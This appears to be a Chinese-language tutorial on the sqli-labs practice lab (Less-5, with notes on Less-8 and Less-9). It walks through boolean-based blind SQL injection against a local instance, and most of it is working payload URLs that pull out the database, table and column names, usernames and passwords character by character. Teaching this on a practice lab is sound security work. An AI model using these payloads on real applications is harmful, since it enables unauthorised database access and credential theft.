输入 ?id=1'报错
判断字段 ?id=1' order by 4 %23 报错 ?id=1' order by 3 %23 不报错 说明存在三个字段
你可能会觉得,使用下面这个就能爆出users表里面的用户名和密码,试试吧
http://127.0.0.1/sqlilabs/Less-5/?id=9999' union select 1,group_concat(username,'---',password),3 from users --+
还是 You are in…
大意了吧,这就是传说中的盲注,也是真实环境中经常遇到的情况,谁写代码,还给你那么多提示,统一返回一种提示,那这里显然就是You are in…
对比一下这两关,less-5没有输出查询结果,只有当查询结果正确时会返回一个You are in.......,查询结果不正确的时候没有返回。没有输出查询结果有判断查询结果是否正确的因素,布尔型盲注
只要你的SQL语句能正常执行(可以查询到结果),就会显示You are in,比如:
查询一个不存在的id,例如:id=9999,就会什么都不显示
通过这个方式也证明了less5 存在布尔型盲注。一正一反,非黑即白,就给你两种提示,查到了,提示You are in,没查到黑屏,所以我们可以利用这种方式来进行爆破 当然一般遇见这种情况,大家都会选择burp或者sqlmap进行爆破,其实工具使用非常简单,我们这里多多演示手工过程(原理),其实工具就是把手工过程做成大量的请求,根据上一次返回值来进行下一次的请求发送
经常,盲注中也会用到sleep 但是既然他都给这两种提示了,我们就先不用sleep(看看后面有木有机会可以用到)
使用left 因为我们得不到任何提示,所以只能一个字母一个字母的去爆破,比如库,要把每一位取出来,然后和26个字母比较(或者和ascii码比较)
主要思路
主要思路一般是:找出闭合方法,利用截断函数对要查询的结果的每一位进行比较,通过回显判断对错来猜出查询结果
猜测数据库长度,大于10不成立,就大于5。。。最后是等于8
http://127.0.0.1/sqlilabs/Less-5/?id=1' and length(database())>10--+ 里面的>10是用于判断数据库的长度,都可以使用二分查找的思路 http://127.0.0.1/sqlilabs/Less-5/?id=1'and length(database())>10--+ ... http://127.0.0.1/sqlilabs/Less-5/?id=1' and length(database())=8--+
一共8位,我们就一位一位进行爆破吧,使用这种方法,慢慢来
http://127.0.0.1/sqlilabs/Less-5/?id=1' and left(database(),1)='a'--+ http://127.0.0.1/sqlilabs/Less-5/?id=1'and left(database(),1)='s'--+ ... http://127.0.0.1/sqlilabs/Less-5/?id=1' and left(database(),2)='sa'--+ http://127.0.0.1/sqlilabs/Less-5/?id=1'and left(database(),2)='se'--+ ... ... http://127.0.0.1/sqlilabs/Less-5/?id=1' and left(database(),8)='security'--+
爆表名
http://127.0.0.1/sqlilabs/Less-5/?id=1' and ascii(substr((select table_name from information_schema.tables where table_schema = database() limit a,1),b,1))>n a是从0开始第几个表,b从1开始为第几个字符,n是ASCII所对应的十进制数 ascii函数是求出ascii码最后结果和n比较 substr配合参数b一次找出表名的每一位 limit配合a找到每一张表 ... http://127.0.0.1/sqlilabs/Less-5/?id=1'and ascii(substr((select table_name from information_schema.tables where table_schema = database() limit 0,1),1,1))=101 --+ 这个payload是拿出当前数据库的第一张表的第一个字符,和e(101)比较
关键的攻击代码
第一张表(emails) http://127.0.0.1/sqlilabs/Less-5/?id=1' and length((select table_name from information_schema.tables where table_schema=database() limit 0,1))='7 --+ http://127.0.0.1/sqlilabs/Less-5/?id=1' and ascii(substr((select table_name from information_schema.tables where table_schema = database() limit 0,1),1,1))=101 --+ http://127.0.0.1/sqlilabs/Less-5/?id=1'and ascii(substr((select table_name from information_schema.tables where table_schema = database() limit 0,1),2,1))=109 --+ http://127.0.0.1/sqlilabs/Less-5/?id=1' and ascii(substr((select table_name from information_schema.tables where table_schema = database() limit 0,1),3,1))=97 --+ http://127.0.0.1/sqlilabs/Less-5/?id=1'and ascii(substr((select table_name from information_schema.tables where table_schema = database() limit 0,1),4,1))=105 --+ http://127.0.0.1/sqlilabs/Less-5/?id=1' and ascii(substr((select table_name from information_schema.tables where table_schema = database() limit 0,1),5,1))=108 --+ http://127.0.0.1/sqlilabs/Less-5/?id=1'and ascii(substr((select table_name from information_schema.tables where table_schema = database() limit 0,1),6,1))=115 --+ 第二张表(referers) http://127.0.0.1/sqlilabs/Less-5/?id=1' and length((select table_name from information_schema.tables where table_schema=database() limit 1,1))='8 --+ ... 第三张表(uagents) ... 第四张表(users) http://127.0.0.1/sqlilabs/Less-5/?id=1' and length((select table_name from information_schema.tables where table_schema=database() limit 3,1))='5 --+ http://127.0.0.1/sqlilabs/Less-5/?id=1' and ascii(substr((select table_name from information_schema.tables where table_schema = database() limit 3,1),1,1))=117 --+ http://127.0.0.1/sqlilabs/Less-5/?id=1'and ascii(substr((select table_name from information_schema.tables where table_schema = database() limit 3,1),2,1))=115 --+ http://127.0.0.1/sqlilabs/Less-5/?id=1' and ascii(substr((select table_name from information_schema.tables where table_schema = database() limit 3,1),3,1))=101 --+ http://127.0.0.1/sqlilabs/Less-5/?id=1'and ascii(substr((select table_name from information_schema.tables where table_schema = database() limit 3,1),4,1))=114 --+ http://127.0.0.1/sqlilabs/Less-5/?id=1' and ascii(substr((select table_name from information_schema.tables where table_schema = database() limit 3,1),5,1))=115 --+ 列名与值 http://127.0.0.1/sqlilabs/Less-5/?id=1'and (select length(column_name) from information_schema.columns where table_schema=database() and table_name='users' limit a,1)=b--+ a从0开始,第a+1列的字段长度和b比较 http://127.0.0.1/sqlilabs/Less-5/?id=1' and ascii(substr((select username from users limit a,1),b,1))=c --+ a从0开始,b从1开始 第a+1条记录的第b位和c比较 关键payload 第一列 http://127.0.0.1/sqlilabs/Less-5/?id=1'and (select length(column_name) from information_schema.columns where table_schema=database() and table_name='users' limit 0,1)=2--+ ... 第二列(username) http://127.0.0.1/sqlilabs/Less-5/?id=1' and (select length(column_name) from information_schema.columns where table_schema=database() and table_name='users' limit 1,1)=8--+ http://127.0.0.1/sqlilabs/Less-5/?id=1'and ascii(substr((select username from users limit 0,1),1,1))=68 --+ http://127.0.0.1/sqlilabs/Less-5/?id=1' and ascii(substr((select username from users limit 0,1),2,1))=117 --+ http://127.0.0.1/sqlilabs/Less-5/?id=1'and ascii(substr((select username from users limit 0,1),3,1))=109 --+ http://127.0.0.1/sqlilabs/Less-5/?id=1' and ascii(substr((select username from users limit 0,1),4,1))=98 --+ ... 第二列(password) http://127.0.0.1/sqlilabs/Less-5/?id=1'and (select length(column_name) from information_schema.columns where table_schema=database() and table_name='users' limit 2,1)=8--+ http://127.0.0.1/sqlilabs/Less-5/?id=1' and ascii(substr((select password from users limit 0,1),1,1))=68 --+ http://127.0.0.1/sqlilabs/Less-5/?id=1'and ascii(substr((select password from users limit 0,1),2,1))=117 --+ http://127.0.0.1/sqlilabs/Less-5/?id=1' and ascii(substr((select password from users limit 0,1),3,1))=109 --+ http://127.0.0.1/sqlilabs/Less-5/?id=1'and ascii(substr((select password from users limit 0,1),4,1))=98 --+ ...
sqli-labs8
手工过程就和前面的一样了,可以直接一步一步来(和第五关的方式一样,可以参考第五关的手工注入过程,把id的值替换成第五关的即可),或者使用python布尔型半自动化注入
sqli-labs9
ssqli-labs less9详解(附py脚本):
https://mp.weixin.qq.com/s/g_rYNeqy7FcfqHmlav82ig
python布尔型,延时型半自动化注入
通过注入发现手工注入会非常的麻烦,非常的持久,为了解决这种问题 通过python进行半自动化注入
脚本链接
